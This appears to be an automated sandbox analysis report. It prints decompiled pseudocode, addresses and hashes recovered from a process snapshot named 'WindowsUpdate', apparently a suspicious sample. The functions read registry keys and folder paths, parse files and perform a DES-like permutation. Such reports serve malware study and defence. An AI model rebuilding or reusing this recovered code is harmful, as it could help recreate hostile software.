                                                                                                                    0x0034f373
                                                                                                                    0x0034f373
                                                                                                                    0x0034f375
                                                                                                                    0x0034f376
                                                                                                                    0x0034f37a
                                                                                                                    0x0034f38b
                                                                                                                    0x0034f394
                                                                                                                    0x0034f397
                                                                                                                    0x0034f39a
                                                                                                                    0x0034f39d
                                                                                                                    0x0034f39e
                                                                                                                    0x0034f3a0
                                                                                                                    0x0034f3aa
                                                                                                                    0x0034f3ab
                                                                                                                    0x0034f3b8
                                                                                                                    0x0034f3ba
                                                                                                                    0x0034f3bd
                                                                                                                    0x0034f3c0
                                                                                                                    0x0034f3c1
                                                                                                                    0x0034f3c6
                                                                                                                    0x0034f3c8
                                                                                                                    0x0034f3c9
                                                                                                                    0x0034f3c9
                                                                                                                    0x0034f3cc
                                                                                                                    0x0034f3d4
                                                                                                                    0x0034f3d5
                                                                                                                    0x0034f3d9
                                                                                                                    0x0034f3e6
                                                                                                                    0x0034f3ed
                                                                                                                    0x0034f3f0
                                                                                                                    0x0034f3f7
                                                                                                                    0x0034f3fa
                                                                                                                    0x0034f3a0
                                                                                                                    0x0034f404
                                                                                                                    0x0034f405
                                                                                                                    0x0034f40c
                                                                                                                    0x0034f414
                                                                                                                    0x0034f41d
                                                                                                                    0x0034f41d
                                                                                                                    0x0034f317
                                                                                                                    0x0034f317
                                                                                                                    0x0034f317
                                                                                                                    0x0034f318
                                                                                                                    0x0034f31b
                                                                                                                    0x0034f329
                                                                                                                    0x0034f329

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _swscanf
                                                                                                                    • String ID: @4$Z
                                                                                                                    • API String ID: 2748852333-449715922
                                                                                                                    • Opcode ID: adcf96810240cb81483a1b8cba20a1ef46843c7a676d06241c54a43d84c2eb00
                                                                                                                    • Instruction ID: 1994938932a24a5cfbc1878433e22f62628faae7c8ca8533f0fafd05f599b6c2
                                                                                                                    • Opcode Fuzzy Hash: adcf96810240cb81483a1b8cba20a1ef46843c7a676d06241c54a43d84c2eb00
                                                                                                                    • Instruction Fuzzy Hash: 9541A075D0038D8ECB12DFE8D8406EEBBF8AB56304F19416AE849AB242D735AA05CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003505AC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 23%
                                                                                                                    			E003505AC(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _v8;
				char _v508;
				char _v1532;
				char _v2556;
				long _v7556;
				int _v7560;
				char _v7564;
				char _v7568;
				void* __edi;
				void* __ebp;
				void* _t37;
				intOrPtr _t42;
				void* _t57;
				intOrPtr _t58;
				signed int _t61;

				_t59 = __esi;
				_t57 = __edx;
				_t51 = __ebx;
				E003ABE9C(0x1d8c);
				_v8 =  *0x482960 ^ _t61;
				_t2 =  &_a12; // 0x350a73
				_t58 =  *_t2;
				_v7560 = 0x400;
				swprintf( &_v7556, 0x400, 0x47471c, _t58);
				_push( &_v7564);
				_push(0x20019);
				_push(0);
				_push( &_v7556);
				_push(0x80000001);
				if( *0x474018() != 0) {
					L6:
					__eflags = _v8 ^ _t61;
					return E003ABE87(_t32, _t51, _v8 ^ _t61, _t57, _t58, _t59);
				} else {
					_v7560 = 0x400;
					_t37 =  *0x474014(_v7564, 0x474744, 0,  &_v7568,  &_v2556,  &_v7560, __esi);
					_t32 =  *0x474010(_v7564);
					_pop(_t59);
					if(_t37 != 0 || E0034F42C(_a4, _a8,  &_v2556,  &_v1532) == 0) {
						goto L6;
					} else {
						E003AC711( &_v508, 0x1f4, 0x474a90);
						_t42 =  *0x483d84;
						_t71 = _t42;
						if(_t42 != 0) {
							_push( &_v508);
							_push(0x474b44);
							_push(_t42);
							E003ADBDE(__ebx, _t58, __esi, __eflags);
							_push(_t58);
							_push(0x474b58);
							_push( *0x483d84);
							E003ADBDE(__ebx, _t58, __esi, __eflags);
							E003ADCF0( *0x483d84, 0x474b68,  &_v1532);
							_push( *0x483d84);
							_push(0x474b78);
							_t32 = E003ADD09(__ebx, _t58, __esi, __eflags);
							goto L6;
						} else {
							_push( &_v1532);
							_push(_t58);
							_push( &_v508);
							return E003ABE87(E003ADF32(_t58, __esi, _t71), __ebx, _v8 ^ _t61, _t57, _t58, __esi, 0x474b2c);
						}
					}
				}
			}


















                                                                                                                    0x003505ac
                                                                                                                    0x003505ac
                                                                                                                    0x003505ac
                                                                                                                    0x003505b4
                                                                                                                    0x003505c0
                                                                                                                    0x003505c4
                                                                                                                    0x003505c4
                                                                                                                    0x003505d9
                                                                                                                    0x003505e3
                                                                                                                    0x003505f1
                                                                                                                    0x003505f2
                                                                                                                    0x003505f7
                                                                                                                    0x003505ff
                                                                                                                    0x00350600
                                                                                                                    0x0035060d
                                                                                                                    0x0035071b
                                                                                                                    0x0035071e
                                                                                                                    0x00350729
                                                                                                                    0x00350613
                                                                                                                    0x00350636
                                                                                                                    0x00350640
                                                                                                                    0x0035064e
                                                                                                                    0x00350656
                                                                                                                    0x00350657
                                                                                                                    0x00000000
                                                                                                                    0x00350681
                                                                                                                    0x00350692
                                                                                                                    0x00350697
                                                                                                                    0x0035069f
                                                                                                                    0x003506a1
                                                                                                                    0x003506d4
                                                                                                                    0x003506d5
                                                                                                                    0x003506da
                                                                                                                    0x003506db
                                                                                                                    0x003506e0
                                                                                                                    0x003506e1
                                                                                                                    0x003506e6
                                                                                                                    0x003506ec
                                                                                                                    0x00350703
                                                                                                                    0x00350708
                                                                                                                    0x0035070e
                                                                                                                    0x00350713
                                                                                                                    0x00000000
                                                                                                                    0x003506a3
                                                                                                                    0x003506a9
                                                                                                                    0x003506aa
                                                                                                                    0x003506b1
                                                                                                                    0x003506cd
                                                                                                                    0x003506cd
                                                                                                                    0x003506a1
                                                                                                                    0x00350657

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _fprintf$_wprintfswprintf
                                                                                                                    • String ID: s5
                                                                                                                    • API String ID: 1838901435-95036338
                                                                                                                    • Opcode ID: 153e71cd2766c3e643532dcd5ca0fb932407f8bea2ce10dbf7ab084d9b140f2a
                                                                                                                    • Instruction ID: c53386c520a5160f2f743e4b7933772e1d432eaeed0795531c8ae73e3a4fb808
                                                                                                                    • Opcode Fuzzy Hash: 153e71cd2766c3e643532dcd5ca0fb932407f8bea2ce10dbf7ab084d9b140f2a
                                                                                                                    • Instruction Fuzzy Hash: B6318372940119ABDB11DF94DC42FFEB3BCEB84701F0104A6FA09A6152EF71AE949F64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CF387 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 26%
                                                                                                                    			E002CF387(void* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v136;
				char _v271;
				void _v272;
				char _v276;
				char _v532;
				char _v784;
				char _v788;
				char _v792;
				char _v796;
				char _v1052;
				char _v1136;
				signed short _v1152;
				char _v1160;
				intOrPtr _v1196;
				signed int _v1208;
				char _v1467;
				char _v1468;
				char _v1980;
				intOrPtr _v1988;
				intOrPtr _v2044;
				signed int _v2056;
				char _v2076;
				signed int _v2080;
				char _v2315;
				char _v2316;
				char _v2572;
				intOrPtr _v4132;
				intOrPtr _v4136;
				intOrPtr _v4140;
				signed int* _v4144;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t100;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				char* _t112;
				void* _t122;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				void* _t128;
				char* _t138;
				signed int _t141;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t166;
				signed int _t168;
				char _t169;
				signed int _t174;
				signed int _t179;
				signed int _t184;
				signed int _t189;
				signed int _t201;
				signed int _t206;
				signed int _t211;
				signed int _t216;
				signed int _t219;
				intOrPtr* _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t227;
				signed int _t237;
				signed int _t241;
				intOrPtr _t243;
				signed int _t245;
				void* _t247;
				signed int _t253;
				void* _t261;
				void* _t266;
				void* _t269;
				void* _t272;
				void* _t273;
				void* _t276;
				intOrPtr* _t282;
				intOrPtr* _t283;
				void* _t284;
				intOrPtr* _t288;
				intOrPtr* _t290;
				intOrPtr* _t298;
				void* _t300;
				signed int _t304;
				signed int _t308;
				signed int _t310;
				intOrPtr* _t311;
				signed int _t312;
				intOrPtr* _t315;
				int _t317;
				intOrPtr* _t321;
				void* _t323;
				signed int _t324;
				void* _t325;
				void* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				void* _t337;
				intOrPtr* _t338;
				void* _t339;
				void* _t340;
				intOrPtr* _t341;
				void* _t343;
				void* _t345;
				void* _t346;
				signed int* _t347;
				void* _t349;
				void* _t350;
				void* _t353;
				void* _t354;
				signed int _t355;
				void* _t356;
				void* _t358;
				void* _t360;
				void* _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				void* _t373;
				intOrPtr* _t374;
				void* _t376;
				void* _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				void* _t385;
				signed int _t386;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_v8 =  *0x481f80 ^ _t379;
				_t282 = _a8;
				_t341 =  *0x470104;
				_t100 =  *_t341(0xfffffff5, _t340, _t354, __ebx);
				_t101 =  *0x47004c(_t100,  &_v1160);
				_t355 = _v1152 & 0x0000ffff;
				if(_t101 == 0) {
					_t355 = 0xf;
				}
				E002CB947();
				_t103 = _a4;
				_t407 = _t103 - 1;
				if(_t103 != 1) {
					__eflags = _t103 - 2;
					if(_t103 == 2) {
						goto L18;
					} else {
						__eflags = _t103 - 3;
						if(_t103 == 3) {
							_t245 = E003280AD( *((intOrPtr*)(_t282 + 4)), 0x470f2c);
							__eflags = _t245;
							if(_t245 != 0) {
								E002CF0B7();
							} else {
								E00327AF9( &_v1136, 0x3e8,  *((intOrPtr*)(_t282 + 8)));
								_t321 =  &_v1136;
								_t323 = _t321 + 1;
								do {
									_t253 =  *_t321;
									_t321 = _t321 + 1;
									__eflags = _t253;
								} while (_t253 != 0);
								__eflags = _t321 - _t323 - 1;
								if(_t321 - _t323 >= 1) {
									E002CC857( &_v1136);
								} else {
									E002CF0B7();
									_push(0x470f30);
									E002CEE77();
								}
							}
							_t247 =  *_t341();
							 *0x470050(_t355 | 0x00000008);
							_t353 = _t247;
							_pop(_t378);
							__eflags = 0;
							_t284 = 0xfffffff5;
							return E003272F2(0, _t284, _v8 ^ _t379, _t323, _t353, _t378);
						} else {
							E002CF0B7();
							_push(0x470f00);
							E002CEE77();
							_t383 = _t383 + 4;
							goto L19;
						}
					}
				} else {
					E002CF2D7();
					_t261 =  *_t341(0xfffffff5);
					_t282 =  *0x470050;
					 *_t282(_t261, 0xa);
					E00329C53(_t282, _t341, _t355, _t407);
					E00329C53(_t282, _t341, _t355, _t407);
					E002CEAC7();
					_t266 =  *_t341(0xfffffff5, 0x470d68, 0x470d48, 0x470d40, 0x470d34, 0x470d28, 0x470d1c);
					 *_t282(_t266, 0xf);
					E00329C53(_t282, _t341, _t355, _t407);
					_t383 = _t383 + 0x20;
					_t269 =  *_t341(0xfffffff5, 0x470e64, 0x4703dc);
					 *_t282(_t269, 0xf);
					_t272 =  *0x4700ec(0x470e90,  &_v136, 0x80);
					_t408 = _t272;
					if(_t272 == 0) {
						_t276 =  *_t341(0xfffffff5);
						 *_t282(_t276, 0xc);
						_push(0x470e98);
						E00329C53(_t282, _t341, _t355, _t408);
						_push(0x470ee0);
						E00329C53(_t282, _t341, _t355, _t408);
						_t383 = _t383 + 8;
						E00329F16(_t282, _t355, _t408);
					}
					_t273 =  *_t341(0xfffffff5);
					_t355 = _t355 | 0x00000008;
					 *_t282(_t273, _t355);
					E00328F58(0);
					L18:
					E002CF0B7();
					L19:
					_t105 =  *_t341(0xfffffff5);
					_t356 = _t355 | 0x00000008;
					 *0x470050(_t105, _t356);
					E00328F58(0);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t379);
					_t380 = _t383;
					_v1208 =  *0x481f80 ^ _t380;
					_v1468 = 0;
					E00327C87( &_v1467, 0, 0x103);
					_t385 = _t383 - 0x314 + 0xc;
					_v1988 = 0x104;
					_t112 =  &_v1980;
					if(_v1196 != 0xf) {
						_push(0x470fa8);
					} else {
						_push(0x470f60);
					}
					_push(0x200);
					_push(_t112);
					E00327AF9();
					_t386 = _t385 + 0xc;
					_push( &_v788);
					_push(0x20019);
					_push(0);
					_push( &_v784);
					_push(0x80000002);
					if( *0x470028() != 0) {
						L45:
						__eflags = 0;
						return E003272F2(0, _t282, _v12 ^ _t380, _t323, _t341, _t356);
					} else {
						_t122 =  *0x470024(_v788, 0, 0,  &_v796,  &_v272,  &_v792);
						if(_t122 != 0 || _v792 <= _t122 || _v272 == _t122) {
							 *0x47002c(_v788);
							goto L45;
						} else {
							 *0x47002c(_v788, _t341, _t356);
							if(_v272 == 0x22) {
								_t315 =  &_v272;
								_t31 = _t315 + 1; // 0x23
								_t339 = _t31;
								do {
									_t243 =  *_t315;
									_t315 = _t315 + 1;
								} while (_t243 != 0);
								_t317 = _t315 - _t339 - 1;
								if(_t317 > 0) {
									_t356 =  &_v271;
									memcpy( &_v272, _t356, _t317);
									_t386 = _t386 + 0xc;
									_t341 = _t356 + _t317 + _t317;
								}
							}
							_t288 =  &_v272;
							_t35 = _t288 + 1; // 0x23
							_t324 = _t35;
							do {
								_t125 =  *_t288;
								_t288 = _t288 + 1;
							} while (_t125 != 0);
							_t36 = _t288 - _t324 - 1; // 0x22
							_t126 = _t36;
							if(_t126 <= 0) {
								L37:
								_t290 =  &_v272;
								_t40 = _t290 + 1; // 0x1
								_t325 = _t40;
								do {
									_t127 =  *_t290;
									_t290 = _t290 + 1;
								} while (_t127 != 0);
								_t41 = _t290 - _t325 + 1; // 0x2
								_t342 = _t41;
								_t128 = E00327BCE(_t282, _t41, _t41);
								_t357 = _t128;
								if(_t128 != 0) {
									E00327AF9(_t357, _t342,  &_v272);
								}
								_pop(_t343);
								_pop(_t358);
								return E003272F2(_t357, _t282, _v12 ^ _t380, _t325, _t343, _t358);
							} else {
								while( *((char*)(_t380 + _t126 - 0x108)) != 0x5c) {
									_t126 = _t126 - 1;
									if(_t126 > 0) {
										continue;
									} else {
										goto L37;
									}
									goto L80;
								}
								__eflags = _t126 - 0x104;
								if(_t126 >= 0x104) {
									E00327EEC();
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t380);
									_t381 = _t386;
									_v2056 =  *0x481f80 ^ _t381;
									_push(_t356);
									_push(_t341);
									_v2316 = 0;
									E00327C87( &_v2315, 0, 0x103);
									_t390 = _t386 - 0x814 + 0xc;
									_t344 = 0;
									_t359 = 0;
									__eflags = _v2044 - 0xf;
									_t138 =  &_v2572;
									if(_v2044 != 0xf) {
										_push(0x471000);
									} else {
										_push(0x470fec);
									}
									E00327AF9();
									_t391 = _t390 + 0xc;
									_t141 =  *0x470200(0, 0x1a, 0, 0,  &_v276, _t138, 0x100);
									__eflags = _t141;
									if(_t141 == 0) {
										E00327AF9( &_v1052, 0x208,  &_v276);
										E00327B4E( &_v1052, 0x208, 0x470790);
										E00327B4E( &_v1052, 0x208,  &_v532);
										E00327B4E( &_v1052, 0x208, 0x471010);
										_v2080 = _t359;
										_t154 = E0032928A( &_v2080,  &_v1052, 0x470890);
										_t392 = _t391 + 0x3c;
										__eflags = _t154;
										if(_t154 != 0) {
											goto L52;
										} else {
											_t157 = _v2080;
											__eflags = _t157;
											if(__eflags == 0) {
												goto L52;
											} else {
												_push(_t157);
												_push(0x400);
												_push( &_v2076);
												_t159 = E00329087(_t282, _t344, _t359, __eflags);
												_t393 = _t392 + 0xc;
												__eflags = _t159;
												if(__eflags == 0) {
													L77:
													_push(_v2080);
													E00329010(_t282, _t344, _t359, __eflags);
													_pop(_t346);
													__eflags = _v16 ^ _t381;
													_pop(_t361);
													return E003272F2(_t344, _t282, _v16 ^ _t381, _t324, _t346, _t361);
												} else {
													do {
														E00328317( &_v2076, 0x400);
														_t395 = _t393 + 8;
														__eflags = _t359;
														if(_t359 != 0) {
															_t166 = E00328487( &_v2076, 0x471030);
															_t396 = _t395 + 8;
															__eflags = _t166;
															if(__eflags != 0) {
																_t168 = E00328487( &_v2076, 0x471038);
																_t397 = _t396 + 8;
																__eflags = _t168;
																if(_t168 != 0) {
																	 *_t168 = 0x5c;
																}
																_t298 =  &_v2076;
																_t326 = _t298 + 1;
																do {
																	_t169 =  *_t298;
																	_t298 = _t298 + 1;
																	__eflags = _t169;
																} while (_t169 != 0);
																_t300 = _t298 - _t326 - 1;
																__eflags = _t300 - 0x400;
																if(_t300 >= 0x400) {
																	E00327EEC();
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t381);
																	_push(_t359);
																	_push(_t344);
																	_t347 = _v4144;
																	_t362 = _t347[1];
																	_t327 =  *_t347;
																	_t174 = (_t362 >> 0x00000004 ^ _t327) & 0x0f0f0f0f;
																	_t328 = _t327 ^ _t174;
																	_t363 = _t362 ^ _t174 << 0x00000004;
																	_t179 = (_t328 >> 0x00000010 ^ _t363) & 0x0000ffff;
																	_t364 = _t363 ^ _t179;
																	_t329 = _t328 ^ _t179 << 0x00000010;
																	_t184 = (_t364 >> 0x00000002 ^ _t329) & 0x33333333;
																	_t330 = _t329 ^ _t184;
																	_t365 = _t364 ^ _t184 << 0x00000002;
																	_t189 = (_t330 >> 0x00000008 ^ _t365) & 0x00ff00ff;
																	_t366 = _t365 ^ _t189;
																	_t331 = _t330 ^ _t189 << 0x00000008;
																	_t304 = (_t366 >> 0x00000001 ^ _t331) & 0x55555555;
																	 *_t347 = _t304 ^ _t331;
																	_t347[1] = _t304 + _t304 ^ _t366;
																	E002CFFF7(_t347, _v4132, 0);
																	E002CFFF7(_t347, _v4136, 1);
																	E002CFFF7(_t347, _v4140, 0);
																	_t367 = _t347[1];
																	_t332 =  *_t347;
																	_t201 = (_t367 >> 0x00000001 ^ _t332) & 0x55555555;
																	_t333 = _t332 ^ _t201;
																	_t368 = _t367 ^ _t201 + _t201;
																	_t206 = (_t333 >> 0x00000008 ^ _t368) & 0x00ff00ff;
																	_t369 = _t368 ^ _t206;
																	_t334 = _t333 ^ _t206 << 0x00000008;
																	_t211 = (_t369 >> 0x00000002 ^ _t334) & 0x33333333;
																	_t335 = _t334 ^ _t211;
																	_t370 = _t369 ^ _t211 << 0x00000002;
																	_t216 = (_t335 >> 0x00000010 ^ _t370) & 0x0000ffff;
																	_t371 = _t370 ^ _t216;
																	_t336 = _t335 ^ _t216 << 0x00000010;
																	_t308 = (_t371 >> 0x00000004 ^ _t336) & 0x0f0f0f0f;
																	_t219 = _t308 ^ _t336;
																	_t310 = _t308 << 0x00000004 ^ _t371;
																	__eflags = _t310;
																	 *_t347 = _t219;
																	_t347[1] = _t310;
																	return _t219;
																} else {
																	_push(_t282);
																	 *((char*)(_t381 + _t300 - 0x810)) = _t169;
																	_t221 = E00328487( &_v2076, 0x47103c);
																	_t311 =  &_v276;
																	_t399 = _t397 + 8;
																	_t283 = _t221;
																	_t79 = _t311 + 1; // 0x1
																	_t337 = _t79;
																	do {
																		_t222 =  *_t311;
																		_t311 = _t311 + 1;
																		__eflags = _t222;
																	} while (_t222 != 0);
																	_t312 = _t311 - _t337;
																	__eflags = _t312;
																	_t338 =  &_v532;
																	_t373 = _t338 + 1;
																	do {
																		_t223 =  *_t338;
																		_t338 = _t338 + 1;
																		__eflags = _t223;
																	} while (_t223 != 0);
																	_t324 = _t338 - _t373;
																	__eflags = _t324;
																	_t374 = _t283;
																	_t82 = _t374 + 1; // 0x1
																	_t349 = _t82;
																	do {
																		_t224 =  *_t374;
																		_t374 = _t374 + 1;
																		__eflags = _t224;
																	} while (_t224 != 0);
																	_t83 = _t312 + 3; // 0x4
																	_t359 = _t374 - _t349 + _t83 + _t324;
																	_t227 = E00327BCE(_t283, _t349, _t374 - _t349 + _t83 + _t324);
																	_t344 = _t227;
																	_t393 = _t399 + 4;
																	__eflags = _t227;
																	if(__eflags != 0) {
																		E00327AF9(_t344, _t359,  &_v276);
																		E00327B4E(_t344, _t359, 0x470790);
																		E00327B4E(_t344, _t359,  &_v532);
																		E00327B4E(_t344, _t359, 0x470790);
																		_t86 = _t283 + 1; // 0x1
																		E00327B4E(_t344, _t359, _t86);
																		_t393 = _t393 + 0x3c;
																	}
																	_pop(_t282);
																	goto L77;
																}
															} else {
																goto L61;
															}
														} else {
															_t241 = E00328487( &_v2076, 0x471020);
															_t396 = _t395 + 8;
															__eflags = _t241;
															if(__eflags != 0) {
																_t359 = 1;
															}
															goto L61;
														}
														goto L80;
														L61:
														_push(_v2080);
														_push(0x400);
														_push( &_v2076);
														_t237 = E00329087(_t282, _t344, _t359, __eflags);
														_t393 = _t396 + 0xc;
														__eflags = _t237;
													} while (__eflags != 0);
													_push(_v2080);
													E00329010(_t282, _t344, _t359, __eflags);
													_pop(_t350);
													_pop(_t376);
													__eflags = _v16 ^ _t381;
													return E003272F2(_t344, _t282, _v16 ^ _t381, _t324, _t350, _t376);
												}
											}
										}
									} else {
										 *0x470124();
										L52:
										_pop(_t345);
										_pop(_t360);
										__eflags = _v16 ^ _t381;
										return E003272F2(0, _t282, _v16 ^ _t381, _t324, _t345, _t360);
									}
								} else {
									 *((char*)(_t380 + _t126 - 0x108)) = 0;
									goto L37;
								}
							}
						}
					}
				}
				L80:
			}






























































































































































                                                                                                                    0x002cf397
                                                                                                                    0x002cf39b
                                                                                                                    0x002cf3a0
                                                                                                                    0x002cf3a8
                                                                                                                    0x002cf3b2
                                                                                                                    0x002cf3b8
                                                                                                                    0x002cf3c1
                                                                                                                    0x002cf3c3
                                                                                                                    0x002cf3c3
                                                                                                                    0x002cf3c8
                                                                                                                    0x002cf3cd
                                                                                                                    0x002cf3d0
                                                                                                                    0x002cf3d3
                                                                                                                    0x002cf465
                                                                                                                    0x002cf468
                                                                                                                    0x00000000
                                                                                                                    0x002cf46e
                                                                                                                    0x002cf46e
                                                                                                                    0x002cf471
                                                                                                                    0x002cf492
                                                                                                                    0x002cf49a
                                                                                                                    0x002cf49c
                                                                                                                    0x002cf4f1
                                                                                                                    0x002cf49e
                                                                                                                    0x002cf4ad
                                                                                                                    0x002cf4b2
                                                                                                                    0x002cf4bb
                                                                                                                    0x002cf4be
                                                                                                                    0x002cf4be
                                                                                                                    0x002cf4c0
                                                                                                                    0x002cf4c1
                                                                                                                    0x002cf4c1
                                                                                                                    0x002cf4c7
                                                                                                                    0x002cf4ca
                                                                                                                    0x002cf4e7
                                                                                                                    0x002cf4cc
                                                                                                                    0x002cf4cc
                                                                                                                    0x002cf4d1
                                                                                                                    0x002cf4d6
                                                                                                                    0x002cf4db
                                                                                                                    0x002cf4ca
                                                                                                                    0x002cf4f8
                                                                                                                    0x002cf4ff
                                                                                                                    0x002cf508
                                                                                                                    0x002cf509
                                                                                                                    0x002cf50c
                                                                                                                    0x002cf50e
                                                                                                                    0x002cf517
                                                                                                                    0x002cf473
                                                                                                                    0x002cf473
                                                                                                                    0x002cf478
                                                                                                                    0x002cf47d
                                                                                                                    0x002cf482
                                                                                                                    0x00000000
                                                                                                                    0x002cf482
                                                                                                                    0x002cf471
                                                                                                                    0x002cf3d9
                                                                                                                    0x002cf3d9
                                                                                                                    0x002cf3e0
                                                                                                                    0x002cf3e2
                                                                                                                    0x002cf3eb
                                                                                                                    0x002cf406
                                                                                                                    0x002cf410
                                                                                                                    0x002cf418
                                                                                                                    0x002cf41f
                                                                                                                    0x002cf424
                                                                                                                    0x002cf430
                                                                                                                    0x002cf435
                                                                                                                    0x002cf43a
                                                                                                                    0x002cf43f
                                                                                                                    0x002cf452
                                                                                                                    0x002cf458
                                                                                                                    0x002cf45a
                                                                                                                    0x002cf51a
                                                                                                                    0x002cf51f
                                                                                                                    0x002cf521
                                                                                                                    0x002cf526
                                                                                                                    0x002cf52b
                                                                                                                    0x002cf530
                                                                                                                    0x002cf535
                                                                                                                    0x002cf538
                                                                                                                    0x002cf538
                                                                                                                    0x002cf53f
                                                                                                                    0x002cf541
                                                                                                                    0x002cf546
                                                                                                                    0x002cf54a
                                                                                                                    0x002cf54f
                                                                                                                    0x002cf54f
                                                                                                                    0x002cf554
                                                                                                                    0x002cf556
                                                                                                                    0x002cf558
                                                                                                                    0x002cf55d
                                                                                                                    0x002cf565
                                                                                                                    0x002cf56a
                                                                                                                    0x002cf56b
                                                                                                                    0x002cf56c
                                                                                                                    0x002cf56d
                                                                                                                    0x002cf56e
                                                                                                                    0x002cf56f
                                                                                                                    0x002cf570
                                                                                                                    0x002cf571
                                                                                                                    0x002cf572
                                                                                                                    0x002cf573
                                                                                                                    0x002cf574
                                                                                                                    0x002cf575
                                                                                                                    0x002cf576
                                                                                                                    0x002cf577
                                                                                                                    0x002cf578
                                                                                                                    0x002cf587
                                                                                                                    0x002cf598
                                                                                                                    0x002cf59f
                                                                                                                    0x002cf5a4
                                                                                                                    0x002cf5ab
                                                                                                                    0x002cf5b5
                                                                                                                    0x002cf5bb
                                                                                                                    0x002cf5c4
                                                                                                                    0x002cf5bd
                                                                                                                    0x002cf5bd
                                                                                                                    0x002cf5bd
                                                                                                                    0x002cf5c9
                                                                                                                    0x002cf5ce
                                                                                                                    0x002cf5cf
                                                                                                                    0x002cf5d4
                                                                                                                    0x002cf5dd
                                                                                                                    0x002cf5de
                                                                                                                    0x002cf5e3
                                                                                                                    0x002cf5eb
                                                                                                                    0x002cf5ec
                                                                                                                    0x002cf5f9
                                                                                                                    0x002cf712
                                                                                                                    0x002cf717
                                                                                                                    0x002cf721
                                                                                                                    0x002cf5ff
                                                                                                                    0x002cf61e
                                                                                                                    0x002cf626
                                                                                                                    0x002cf70c
                                                                                                                    0x00000000
                                                                                                                    0x002cf644
                                                                                                                    0x002cf64c
                                                                                                                    0x002cf659
                                                                                                                    0x002cf65b
                                                                                                                    0x002cf661
                                                                                                                    0x002cf661
                                                                                                                    0x002cf667
                                                                                                                    0x002cf667
                                                                                                                    0x002cf669
                                                                                                                    0x002cf66a
                                                                                                                    0x002cf670
                                                                                                                    0x002cf673
                                                                                                                    0x002cf675
                                                                                                                    0x002cf681
                                                                                                                    0x002cf681
                                                                                                                    0x002cf681
                                                                                                                    0x002cf681
                                                                                                                    0x002cf673
                                                                                                                    0x002cf683
                                                                                                                    0x002cf689
                                                                                                                    0x002cf689
                                                                                                                    0x002cf68c
                                                                                                                    0x002cf68c
                                                                                                                    0x002cf68e
                                                                                                                    0x002cf68f
                                                                                                                    0x002cf695
                                                                                                                    0x002cf695
                                                                                                                    0x002cf69a
                                                                                                                    0x002cf6ab
                                                                                                                    0x002cf6ab
                                                                                                                    0x002cf6b1
                                                                                                                    0x002cf6b1
                                                                                                                    0x002cf6b7
                                                                                                                    0x002cf6b7
                                                                                                                    0x002cf6b9
                                                                                                                    0x002cf6ba
                                                                                                                    0x002cf6c0
                                                                                                                    0x002cf6c0
                                                                                                                    0x002cf6c4
                                                                                                                    0x002cf6c9
                                                                                                                    0x002cf6d0
                                                                                                                    0x002cf6db
                                                                                                                    0x002cf6e0
                                                                                                                    0x002cf6e3
                                                                                                                    0x002cf6e6
                                                                                                                    0x002cf6f4
                                                                                                                    0x002cf69c
                                                                                                                    0x002cf69c
                                                                                                                    0x002cf6a6
                                                                                                                    0x002cf6a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002cf6a9
                                                                                                                    0x002cf6f5
                                                                                                                    0x002cf6fa
                                                                                                                    0x002cf722
                                                                                                                    0x002cf727
                                                                                                                    0x002cf728
